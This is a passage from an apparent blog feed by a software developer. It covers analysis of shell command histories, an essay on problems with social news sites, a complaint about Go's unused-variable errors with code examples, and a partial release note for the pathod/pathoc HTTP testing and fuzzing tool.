I fed this\ninto <a rel=\"external\" href=\"http:\/\/pandas.pydata.org\/\">Pandas<\/a> for analysis, parsing each command\nusing a combination of hand-hacked heuristics and the built-in\n<a rel=\"external\" href=\"http:\/\/docs.python.org\/2\/library\/shlex.html\">shlex<\/a> module. The remainder of\nthis post is a light exploration of some approaches to this dataset, steering\nclear of the obvious and tediously well-covered security implications.<\/p>\n<div class=\"media\">\n    <a href=\"topcmds.png\">\n        <img src=\"topcmds.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>One way to slice the data is to look at the percentage of history files a given\ncommand appears in. This gives us a nice listing of the top commands by user\nprevalence, which you can see in the graph on the left above. On the right, I've\ntaken the same list of commands, and checked how many invocations are preceded\nby a <strong>man<\/strong> lookup for the command. This gives us an idea of which\ncommonly-used commands have difficult or unintuitive interfaces. It's\ninteresting that <strong>ln<\/strong> is right at the top of the list, considering how simple\nthe command syntax is. My theory is that everyone forgets the order of the\nsource and target files.<\/p>\n<div class=\"media\">\n    <a href=\"editors.png\">\n        <img src=\"editors.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"media\">\n    <a href=\"tmuxes.png\">\n        <img src=\"tmuxes.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Since we have a list of the most widely used commands, it's also trivial to do\nsilly popularity comparisons. 
Above is the obvious look at the state of the\neditor wars (vim is winning, folks), and a check on how\n<a rel=\"external\" href=\"http:\/\/tmux.sourceforge.net\/\">tmux<\/a> is doing in supplanting screen (the faster\nthe better).<\/p>\n<p><div class=\"media\">\n    <a href=\"args-ssh.png\">\n        <img src=\"args-ssh.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"args-mkdir.png\">\n        <img src=\"args-mkdir.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"args-rm.png\">\n        <img src=\"args-rm.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"args-ls.png\">\n        <img src=\"args-ls.png\"  \/>\n    <\/a>\n\n    \n<\/div><\/p>\n<p>Another interesting thing to do is to look at the most commonly used flags to\ncommands. I think having \"real data\" of command use may well guide us to design\nbetter command-line interfaces. I'd love to know the most common invocation\nflags for some of the tools I write.<\/p>\n<p>I'll stop there. The data pool in this case is very deep, and there is a huge\nrange of interesting bits of command-line ethnography that could be done. Stay\nposted for more in the coming weeks.<\/p>\n"},{"title":"The trouble with social news","published":"2013-01-24T00:00:00+00:00","updated":"2013-01-24T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/trouble-with-social-news\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/trouble-with-social-news\/","content":"<p>There is something terribly awry with the social news ecosystem. This is a\nfeeling that's been growing on me over the last few years, and is the reason why\nI've cut both <a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a> and <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker\nNews<\/a> (which together constitute pretty much all of\n\"social news\") out of my information diet.  
Although I've mulled over things in\nvarious conversations, I've never actually tried to put my feeling of unease in\nwriting, until today. What's spurring me into action is a <a rel=\"external\" href=\"http:\/\/yann.lecun.com\/ex\/pamphlets\/publishing-models.html\">proposal by Yann\nLeCun<\/a> that a model\nsimilar to social news be adopted for scientific peer review - self-assembled\nReviewing Entities voting on streams of submitted papers, regulated by a\nreputation system for authors and reviewers. Basically, this is science a la\nReddit: complete with subreddits, karma and upboats. I find the idea frankly\nterrifying.<\/p>\n<p>I guess it's time, then, to put finger to keyboard and lay out what disquiets\nme about social news.<\/p>\n<h2 id=\"karma-corrupts\">Karma Corrupts<\/h2>\n<p>You start by introducing a reputation mechanism like\n<a rel=\"external\" href=\"http:\/\/www.reddit.com\/wiki\/faq#toc_9\">karma<\/a> to improve some outcome - say, to\nincrease the quality of comments, or to apply a threshold to restrict voting to\ntrustworthy community members. This seems like a plausible and even elegant\nmechanism at first, until you discover the terrible side-effects.<\/p>\n<p>Humans are fundamentally status-seeking social apes, and you've now introduced\na visible measure of social worth that people will be driven to maximize. In\nthe real world, we have a word for those who spend their lives accumulating\nkarma - we call them politicians. And so, within karma communities, we see the\nrise of a political class - persuasive centrists who cater (perhaps\nunconsciously) to a constituency, and who express (perhaps eloquently) opinions\ncalculated to appeal to the masses and avoid controversy. 
Hacker News and many\nsubreddits are dominated by people like this, whose comments are largely\npredictable and rarely add anything new or unexpected to the conversation.<\/p>\n<p>At the bottom end of the food chain, we have a different class of creature with\nthe same basic aim as the politicians, but without the persuasive charm needed\nto pull off the political approach. These are the karma whores, who use a\nmixture of frank pandering, provocation and calculated outrage to achieve the\nsame aims.<\/p>\n<p>The karma maximization game often acts contrary to the goals we aimed to\nachieve by introducing karma in the first place: the tenor of the community\nsuffers, the diversity of opinion declines, and the karma whores post pictures\nof their cats everywhere.<\/p>\n<h2 id=\"the-lossy-sieve\">The Lossy Sieve<\/h2>\n<p>Go and have a look at the <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\/newest\">new story submission\nqueue<\/a> on Hacker News. Scroll through a few\npages, and pay attention to the stories stuck at one vote - they will most\nlikely never receive another upvote and will die in obscurity. Now, go look at\nthe <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\/\">front page<\/a>. When I do this exercise I'm\nstruck by the fact that there's plenty of crap on the front page, and quite a\nbit of good stuff in the submission queue languishing in obscurity. So, quality\ncan't be the sole metric here - what determines what gets onto the front page\nand what doesn't?<\/p>\n<p>Let's try a thought experiment. First, set up a small number of voting accounts - say,\n10 or so. Now, in the new submission queue, pick 5 random stories every\nhour, and give them a small number of upvotes soon after they are submitted. I\npredict that you will find that stories that received this small initial boost\nare vastly more likely to end up on the front page. 
If I'm right, then chance\ndominates story selection - as long as an article exceeds some basic quality\nthreshold, it all depends on who happens to see the story soon after it is\nsubmitted, and whether the spirit moves them to vote. Note that this is not the\ncase at the extremes - frankly bad content won't be upvoted, and really\nimportant stories will usually find their way to the top. The lossy sieve\nphenomenon affects everything in between.<\/p>\n<p>What this boils down to is that social news doesn't provide an effective filter - good\ncontent gets lost, and mediocre content finds its way onto our screens.<\/p>\n<h2 id=\"the-pinhole-effect\">The Pinhole Effect<\/h2>\n<p>In social news, the front page is king. Most users never go beyond the first or\nsecond page of top stories. However, front-page real estate is incredibly\nlimited compared to the volume of submissions on most popular subreddits and on\nHacker News. The effect of this is that we're looking at a fast-flowing river\nof information through a pinhole.  Even assuming that the selection mechanism\nworks flawlessly, what you see on the front page is a small sliver of the\ntotal, chosen through a consensus mechanism that takes no account of individual\nvariation in tastes and interests. The news you see is not tailored to <em>you<\/em> -\nit's tailored to some abstract, average participant, with all the rough edges\nof individuality smoothed away. The effect of this is that even at its best,\nthe stories that emerge from the social news system feel like a predictable\npablum dished up by the hivemind. The subreddit system tries to improve this by\nallowing communities to self-assemble around interests, but the pinhole effect\nstill dominates in busy subreddits like\n<a rel=\"external\" href=\"http:\/\/reddit.com\/r\/programming\">\/r\/programming<\/a>.<\/p>\n<h2 id=\"gaming-the-system\">Gaming The System<\/h2>\n<p>Social news systems are eminently gameable, and cheating is rife. 
Part of the\nreason for this is that a story's destiny depends on a relatively small number\nof votes. If your story has any merit at all, you significantly increase the\nlikelihood that it will end up on the front page by giving it a small nudge at\nthe beginning of its life. If it has no merit whatsoever, you can still force\nit onto people's screens with a few tens or hundreds of votes. Conversely, you\ncan use the same effect to censor and oppress views you disagree with if your\nsocial news site has downvotes. Anyone who's kept an eye on these things can\nrattle off examples of gaming in action: the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Digg_Patriots\">voting\nrings<\/a>, the <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/reddit.com\/comments\/b7e25\/today_i_learned_that_one_of_reddits_most_active\/\">\"social media\nconsultants\"<\/a>,\nthe <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/shitredditsays\">vigilante thought-polizei<\/a>,\nthe <a rel=\"external\" href=\"http:\/\/www.reddit.com\/comments\/2n2tu\/ron_paul_on_the_debate_my_opponents_called_for\/c2n5v8\">political\noperators<\/a>,\nand dozens of other types of manipulation and villainy. What's more - these\nvisible scandals are just the tip of the iceberg. Eyeballs are valuable, and\nthere's an active arms race with social news sites on the one side, and a dark\narmy of spammers, scammers and true believers on the other. How much of what we\nsee is affected by this type of cheating? We just don't know, but my suspicion\nis that the effect is significant.<\/p>\n<p>The point here is broader than any particular instance of gaming. It's that\nsocial news sites are structurally susceptible to manipulation in ways that\ncan't be fixed without changing the core of their operation. 
A system like this\nmight be good enough to deliver <a rel=\"external\" href=\"http:\/\/knowyourmeme.com\/memes\/rage-comics\">rage\ncomics<\/a>, but I feel queasy trusting\nit any further.<\/p>\n<h2 id=\"community-collapse-disorder\">Community Collapse Disorder<\/h2>\n<p>My final beef with social news is a problem that it shares with pretty much all\nonline communities, especially technical ones. We're all familiar with the\nlife-cycle of technical forums. They start with a small community of insiders\nwho create value, which then attracts more people to participate, which then\ndilutes the quality of the contributions (and often introduces a few\npathological bad actors), which then causes the good contributors to move on,\nwhich causes the magic well to dry up. Everyone then takes their toys and moves\nto the next community, and the cycle repeats. We saw this with Usenet and the\noriginal C2 wiki, and we are seeing it now with Hacker News and many technical\nsubreddits all at various points in this life-cycle.<\/p>\n<p>I believe that Community Collapse Disorder is one of the Big Problems online\nthat we don't yet have a satisfactory solution to. People are trying, though.\nHacker News, for instance, seems to be rather <a rel=\"external\" href=\"https:\/\/www.google.com\/search?hl=en&amp;q=site%3Anews.ycombinator.com+%22eternal+september%22\">poignantly aware of its own\ndecline<\/a>,\nwith some of the <a rel=\"external\" href=\"http:\/\/al3x.net\/2011\/02\/22\/solving-the-hacker-news-problem.html\">best of the old-timers calling for an\nalternative<\/a>.\nPaul Graham himself recognizes the issue, and has been tweaking things in\nvarious ways to combat the phenomenon, without much success.<\/p>\n<p>At the moment, we just don't know how to build online communities that are both\ninclusive and stable. 
Democracy, here, seems to lead inevitably to decline, and\nsocial news sites are no exception.<\/p>\n<h2 id=\"a-better-way-forward\">A better way forward?<\/h2>\n<p>A big part of the reason I don't use social news anymore is that my existing\nsocial networks have become so much more effective at turning up good content.\nThe absolute best source of news for me is simply the set of links shared by\nthe folks I follow on <a rel=\"external\" href=\"http:\/\/twitter.com\/cortesi\">Twitter<\/a>. I follow people\nwho post interesting content, and whom I trust to act as information filters\nfor me. Most of them share my technical interests, but some are interesting\nbecause they are from my home town, or because they share some more esoteric\npursuit with me. So, the news stream I see is exactly tailored to me. At the\nsame time, there is also room for idiosyncrasy - if someone I follow shares\nsomething left-field that tickles their fancy, I'll see it. In turn, I try to\nbe a responsible information filter for those who follow me - I find a link or\ntwo worth tweeting on most days.<\/p>\n<p>There are still things I miss - Twitter is great for sharing links, but is an\nawful medium for technical discussion.\n<a rel=\"external\" href=\"https:\/\/plus.google.com\/106243676845481872244\">Google+<\/a> could be a better\nalternative, but just doesn't seem to have achieved liftoff for me. I would\nalso love better tools for aggregating and harvesting links from my social\nnetwork. At the moment I use <a rel=\"external\" href=\"http:\/\/flipboard.com\">Flipboard<\/a> and\n<a rel=\"external\" href=\"http:\/\/getprismatic.com\">Prismatic<\/a>, but I have issues with both. On the\nwhole, though, these are quibbles. 
It seems to me that using social networks to\nfilter news is a better way forward - if I was tackling the social news\nproblem, I'd be building tools to support this process.<\/p>\n"},{"title":"Go: a nice language with an annoying personality","published":"2013-01-18T00:00:00+00:00","updated":"2013-01-18T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/go\/go-rant\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/go\/go-rant\/","content":"<p>Last week, I had the pleasure of attending <a rel=\"external\" href=\"http:\/\/dropbox.com\">Dropbox<\/a>'s\nannual company <a rel=\"external\" href=\"https:\/\/blog.dropbox.com\/2012\/03\/hack-week-ii\/\">hack fest<\/a>.  It\nwas a great opportunity to get a look at how Dropbox works internally, and\nmingle with the smart and driven folks who make one of my favourite products. In\nthe spirit of hack week, me and my friend\n<a rel=\"external\" href=\"http:\/\/twitter.com\/alexdong\">@alexdong<\/a> decided to do our project in Go. We'd\nboth wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful\nthat Go would turn out to hit a magical sweet spot: a light set of abstractions\nhugging close to the machine, while still providing the indoor plumbing and\ncivilized conveniences of life that I had grown used to with languages like\nPython. Five days of furious hacking later, I can report that Go might well\ndeliver on this promise, but has enough annoying personality quirks that I will\nthink twice about basing any more projects on it.<\/p>\n<p>My main beef with Go has nothing to do with fundamental language design, and may\nseem almost inconsequential at first glance. The Go compiler treats unused\nmodule imports and declared variables as compile errors. 
This is great in theory\nand is something you might well want to enforce before code can be committed,\nbut during the actual <em>process<\/em> of producing code it's nothing but an irksome,\nunnecessary pain in the ass. Let's look at a concrete example, starting with a\nsnippet of code as follows <sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup><\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>I'm a firm believer that printing stuff to screen is a programmer's best\ndebugging tool, so say we're hacking away and want to print the value of 
<strong>m<\/strong>\nwhile running our unit tests. We change the code as follows, adding an import\nfor the \"fmt\" module and a call to Print:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">fmt<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Print<\/span><span>(m)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>Now we keep hacking, and want to comment out the print statement for a moment\nlike 
so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">fmt<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/fmt.Print(m)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>This is a compile error. 
We have to switch contexts, move to the top of the\nmodule, also comment out the import, and then move back to the spot we're\nreally hacking on:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/&quot;fmt&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/fmt.Print(m)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>A few seconds later, we want to re-enable the Print statement - so up we go\nagain to the top of the module to re-enable the import. 
This is even worse when\nwe want to, say, comment out the <strong>DoSomething<\/strong> call while hacking:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/DoSomething(m)<\/span><\/span><\/code><\/pre>\n<p>This is also a compile error because now <em>m<\/em> is unused. We have to hunt up in\nour code to find the declaration, which could be explicit or implicit using an\n<strong>:=<\/strong> assignment. 
So, in this case we find the declaration, and use the magic\nunderscore name to throw the offending value away:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    _, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/DoSomething(m)<\/span><\/span><\/code><\/pre>\n<p>That should fix it, right? Well, no. It turns out we've previously declared and\nused <strong>err<\/strong> (a very common idiom), so this is still a compile error. We're\nusing the \"declare and assign\" syntax, but have no new variables on the\nleft-hand side of the \":=\". 
So we need to make another tweak:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    _, err<\/span><span style=\"color: #D73A49;\"> =<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/DoSomething(m)<\/span><\/span><\/code><\/pre>\n<p>Five seconds later, we want to re-enable <strong>DoSomething<\/strong>, and now we have to\nunwind the entire process.<\/p>\n<p>The cumulative effect of all this is like trying to write code while someone\nnext to you randomly knocks your hands off the keyboard every few seconds.\nIt's a pointlessly pedantic approach that adds constant friction to your\nwrite-compile-test cycle, breaks your flow, and just generally makes life a\nlittle harder for very little benefit. 
There's no way to turn this mis-feature\noff, no flag we can pass to the compiler to temporarily make this a warning\nrather than an error while hacking<sup class=\"footnote-reference\"><a href=\"#2\">2<\/a><\/sup>.<\/p>\n<p>The irony of the situation is that I agree with the sentiment behind this. I\ndon't want dangling variables or imports in my codebase. And I agree that if\nsomething is worth warning about it's worth making it an error. The mistake is\nto confuse the state we want at the conclusion of a unit of hacking<sup class=\"footnote-reference\"><a href=\"#3\">3<\/a><\/sup>, with\nwhat we need at every point in between, during the write-compile-test cycle.\nThis cycle is the core of the process of actually producing code, and the\n<a rel=\"external\" href=\"http:\/\/xkcd.com\/353\/\">exhilarating sense of weightlessness<\/a> that you get when\nhacking in Python is largely due to the fact that the language works really,\nreally hard to optimize this process. Go has given away this feeling of\nexhilaration, basically for nothing.<\/p>\n<p>Despite all this, it's still possible that the benefits of Go do outweigh its\nirritating personality. Interfaces, memory management, first-class concurrency\nand static type checking is a knockout combination, and the language in general\nhas something of the taut practicality that I love in C. So, despite the\nrantiness of this post, I'll keep hacking on our project and make sure I\nproduce a few thousand more lines of code before making a final call on the\nlanguage. Look for a project release and a blog post along these lines in the\ncoming months.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>Ellipses indicate \"an arbitrary amount of intervening code\"<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"2\"><sup class=\"footnote-definition-label\">2<\/sup>\n<p>I edited this paragraph a bit for tone. 
I originally accused the Go\ndocumentation of being faintly smug about all of this - which is not fair, and\ndoesn't add anything to the argument.<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"3\"><sup class=\"footnote-definition-label\">3<\/sup>\n<p>Why don't we have a word for this? By \"unit of hacking\", I mean the work\nthat goes on between starting to hack on a change-set and doing a commit. At the\nbeginning and at the end, the code is in a clean state, but in between there\nare many periods of transition where cleanliness requirements are relaxed.<\/p>\n<\/div>\n"},{"title":"Released: pathod 0.3","published":"2012-11-16T00:00:00+00:00","updated":"2012-11-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_3\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_3\/","content":"<p>I've just released <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod 0.3<\/a>, which beefs up\n<a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">pathoc<\/a>'s fuzzing capabilities, improves the\nspec language and includes lots of bugfixes and other small tweaks. Get it while\nit's hot!<\/p>\n<h2 id=\"better-fuzzing\">Better fuzzing<\/h2>\n<p>A major focus of this release is to improve\n<a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">pathoc<\/a>'s capabilities as a basic fuzzing tool.\nI've had fun <a href=\"https:\/\/corte.si\/posts\/code\/pathod\/pythonservers\/\">breaking webservers<\/a>\nwith pathoc, and it's even come in handy in my Day Job. Here's a quick summary\nof how things have changed.<\/p>\n<ul>\n<li>The <strong>-e<\/strong> flag tells pathoc to explain its requests. This prints out an\nexpanded pathoc query specification, with all randomly generated content and\nquery modifications resolved. 
If you trigger an exception, you can precisely\nreplay the offending query using this explanation.<\/li>\n<li>The options for outputting requests and responses have been expanded hugely.\nFirst, the <strong>-q<\/strong> and <strong>-r<\/strong> flags tell pathoc to dump complete records of\nrequests and responses respectively. This data is sniffed by instrumenting\nthe socket, so it is canonical regardless of our ability to interpret returned\ndata. The <strong>-x<\/strong> option makes pathoc dump this data in hexdump format\n(otherwise unprintable characters are escaped to preserve your terminal).<\/li>\n<li>A number of options have been added to let you ignore expected responses.\n<strong>-C<\/strong> takes a comma-separated list of response codes to ignore. <strong>-T<\/strong>\nignores server timeouts. This lets you home in on the exceptional responses\nthat you care about, and ignore the rest.<\/li>\n<\/ul>\n<h2 id=\"language-improvements\">Language improvements<\/h2>\n<ul>\n<li>I've simplified response specifications by making the response message a\nstandard component with 